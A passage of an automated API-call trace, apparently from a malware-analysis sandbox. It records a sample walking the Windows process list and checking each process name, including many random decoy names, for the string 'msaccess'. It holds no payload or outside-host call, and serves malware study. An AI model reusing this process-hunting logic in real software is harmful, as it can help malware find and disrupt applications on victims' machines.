th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0097.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0097.110] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575760 [0097.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3575760, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0097.110] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0097.110] StrStrIA (lpFirst="Memory Compression", lpSrch="msaccess") returned 0x0 [0097.110] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0097.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0097.112] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3575680 [0097.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3575680, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0097.113] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0097.113] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="msaccess") returned 0x0 [0097.113] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0097.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.114] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35763e8 [0097.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x35763e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0097.114] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0097.114] StrStrIA (lpFirst="SearchUI.exe", lpSrch="msaccess") returned 0x0 [0097.115] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0097.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0097.116] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3575780 [0097.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3575780, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0097.116] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0097.116] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="msaccess") returned 0x0 [0097.116] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0097.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.117] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576508 [0097.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3576508, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0097.117] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0097.117] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="msaccess") returned 0x0 [0097.117] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0097.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.119] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576460 [0097.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3576460, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0097.119] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0097.119] StrStrIA (lpFirst="pending.exe", lpSrch="msaccess") returned 0x0 [0097.119] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0097.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0097.120] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356b4d8 [0097.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356b4d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0097.120] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0097.120] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="msaccess") returned 0x0 [0097.120] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0097.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.122] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35755a0 [0097.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x35755a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0097.122] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0097.122] StrStrIA (lpFirst="swing prefer.exe", lpSrch="msaccess") returned 0x0 [0097.122] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0097.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0097.123] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b500 [0097.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356b500, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0097.123] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0097.123] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="msaccess") returned 0x0 [0097.123] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0097.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.125] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35756c0 [0097.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x35756c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0097.125] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0097.125] StrStrIA (lpFirst="nights-attending.exe", lpSrch="msaccess") returned 0x0 [0097.125] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0097.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.126] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35764f0 [0097.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x35764f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0097.126] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0097.126] StrStrIA (lpFirst="installed.exe", lpSrch="msaccess") returned 0x0 [0097.126] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0097.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0097.134] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356b7f8 [0097.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356b7f8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0097.134] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0097.135] StrStrIA (lpFirst="references compounds.exe", lpSrch="msaccess") returned 0x0 [0097.135] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0097.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.136] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35757c0 [0097.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x35757c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0097.136] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0097.136] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="msaccess") returned 0x0 [0097.136] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0097.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0097.137] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575620 [0097.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3575620, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0097.137] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0097.137] StrStrIA (lpFirst="registered try.exe", lpSrch="msaccess") returned 0x0 [0097.137] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0097.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0097.139] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b5a0 [0097.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356b5a0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0097.139] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0097.139] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="msaccess") returned 0x0 [0097.139] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0097.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.140] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3576610 [0097.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3576610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0097.140] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0097.140] StrStrIA (lpFirst="invite.exe", lpSrch="msaccess") returned 0x0 [0097.140] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0097.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.142] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35764a8 [0097.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x35764a8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0097.142] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0097.142] StrStrIA (lpFirst="idol.exe", lpSrch="msaccess") returned 0x0 [0097.142] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0097.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0097.143] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b780 [0097.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356b780, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0097.144] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0097.144] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="msaccess") returned 0x0 [0097.144] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0097.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0097.146] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356b820 [0097.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356b820, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0097.146] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0097.146] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="msaccess") returned 0x0 [0097.146] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0097.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.147] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35765f8 [0097.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x35765f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0097.147] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0097.147] StrStrIA (lpFirst="powell_jane.exe", lpSrch="msaccess") returned 0x0 [0097.147] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0097.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.149] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575840 [0097.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3575840, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0097.149] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0097.149] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="msaccess") returned 0x0 [0097.149] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0097.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.150] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3576520 [0097.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3576520, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0097.150] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0097.150] StrStrIA (lpFirst="gainedshape.exe", lpSrch="msaccess") returned 0x0 [0097.150] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0097.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0097.151] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35757e0 [0097.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x35757e0, cbMultiByte=19, 